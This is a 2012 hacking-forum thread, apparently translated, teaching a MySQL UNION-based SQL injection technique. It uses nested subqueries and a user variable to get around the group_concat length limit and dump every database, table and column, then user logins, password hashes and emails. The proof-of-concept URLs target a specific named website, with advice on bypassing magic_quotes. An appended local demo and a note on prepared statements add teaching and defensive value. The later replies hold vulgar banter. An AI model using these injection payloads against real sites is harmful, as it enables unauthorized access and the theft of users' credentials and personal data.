ionut97 Posted December 29, 2012
by ???Dan & DenJacker

What we will be doing is using nested select statements (subqueries), along with our own variable, to bypass the 1024-character limit of group_concat. If you're new to SQL this might look a bit advanced; just study the code, though. Using this, you can get all the info you need in 2 requests.

First off, the database/table/columns:

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))x)

PoC:
http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+

Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values or the char() function. View the source, and we see every single database/table/column accessible.

Now, to grab information from the columns:

(select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns))))x)

PoC:
http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+

Source: TUTORIAL : [All DB In [1] Request]
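The accumulation trick from the post, reproduced as an added example on a throwaway MySQL 5.x database so it can be studied outside an injection. This is not the authors' code: the demo database, the pp_users table with its columns and rows, the SHA1 "hashes" and the variable name @acc (used instead of the post's empty-named @ for readability) are all assumptions made for the demonstration.

```sql
-- Added example (not from the original post): reproducing the user-variable
-- accumulation trick locally on MySQL 5.x. Database "demo", table "pp_users",
-- its columns and all row contents are constructed for this demo; @acc stands
-- in for the post's empty-named "@" purely for readability.
CREATE DATABASE IF NOT EXISTS demo;
USE demo;
DROP TABLE IF EXISTS pp_users;
CREATE TABLE pp_users (
  ID         INT PRIMARY KEY AUTO_INCREMENT,
  user_login VARCHAR(64),
  user_pass  VARCHAR(128),
  user_email VARCHAR(128)
);

-- Seed 50 rows; each concatenated row is roughly 70 bytes, so the full dump
-- is well past 1024 bytes.
INSERT INTO pp_users (user_login, user_pass, user_email)
SELECT CONCAT('user', n), SHA1(CONCAT('pw', n)), CONCAT('user', n, '@example.test')
FROM (SELECT a.n + 10 * b.n AS n
      FROM (SELECT 0 AS n UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4
            UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9) a,
           (SELECT 0 AS n UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4) b) seq;

-- 1) GROUP_CONCAT is silently cut at group_concat_max_len. MySQL defaults to
--    1024; MariaDB >= 10.2.4 defaults to 1 MiB, so pin it for the demo. An
--    injected SELECT cannot change a session variable, which is why the post
--    needs a workaround at all.
SET SESSION group_concat_max_len = 1024;
SELECT LENGTH(GROUP_CONCAT(ID, 0x3a, user_login, 0x3a, user_pass, 0x3a, user_email
                           SEPARATOR 0x0a)) AS truncated_len
FROM pp_users;                     -- 1024, no matter how many rows exist

-- 2) The post's trick. The first derived-table column initialises @acc to 0x00.
--    The second is a scalar subquery whose WHERE evaluates
--    "@acc IN (@acc := CONCAT(@acc, ...))" once per row: the left side is the
--    old value, the right side assigns the new one, so the comparison is false
--    for every row (the subquery yields NULL) but the assignment still runs.
--    The outer SELECT (@acc) then reads everything that was accumulated.
SELECT LENGTH(dump) AS full_len, dump
FROM (
  SELECT (@acc) AS dump
  FROM (SELECT (@acc := 0x00) AS init,
               (SELECT (@acc) FROM pp_users
                WHERE (@acc) IN (@acc := CONCAT(@acc, 0x0a, ID, 0x3a, user_login,
                                                0x3a, user_pass, 0x3a, user_email))) AS sink
       ) a
) r;                               -- full_len is well over 1024, all 50 rows present

-- 3) Same shape for the schema walk. The post uses "table_schema >= @" so the
--    first clause is true for every row (0x00 sorts before any name, and the
--    accumulated value keeps that leading byte) and the assignment in the
--    second clause is never short-circuited away; filtering on the demo schema
--    just keeps the output small here.
SELECT (@acc) AS schema_dump
FROM (SELECT (@acc := 0x00) AS init,
             (SELECT (@acc) FROM information_schema.columns
              WHERE (table_schema = 'demo')
                AND (@acc) IN (@acc := CONCAT(@acc, 0x0a, ' [ ', table_schema, ' ] > ',
                                              table_name, ' > ', column_name))) AS sink
     ) x;
```

Two caveats a practitioner should keep in mind. The query depends on the order in which MySQL evaluates expressions containing user variables, which the manual explicitly leaves undefined; it behaves as described on the 5.x servers the post targets, but assignment with := inside expressions is deprecated from MySQL 8.0.13 and the optimizer's derived-table handling there can change the order, so test on the actual target version. On the defensive side, the PoC works only because the id parameter is spliced straight into the query string: a prepared statement with a bound parameter for id closes the entire class, regardless of magic_quotes or the group_concat limit.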
Andrei Posted January 2, 2013
If I remember correctly, denjacker presented this syntax at the first DefCamp. Am I wrong?
denjacker Posted January 2, 2013 (edited)
If I remember correctly, denjacker presented this syntax at the first DefCamp. Am I wrong?
http://www.slideshare.net/DefCamp/advanced-data-mining-in-my-sql-injections-using-subqueries-and-custom-variables
The slides also include the benchmark variant, the one the clowns over on HF still have no clue about. If someone posts it there, dozens of tutorials appear instantly and everybody puffs up claiming they've known it since they were little. Fuck HF, FUCK 8===> ???Dan
Edited January 2, 2013 by denjacker
Andrei Posted January 2, 2013
Who the fuck is Dan?!
Later edit: Send another buzz when you're online.
denjacker Posted January 2, 2013
This is ???Dan. He touches himself at night!
Andrei Posted January 2, 2013
It's good that at least you're credited among the authors, although in reality the order should be reversed. Such specimens need to step into the spotlight now and then too.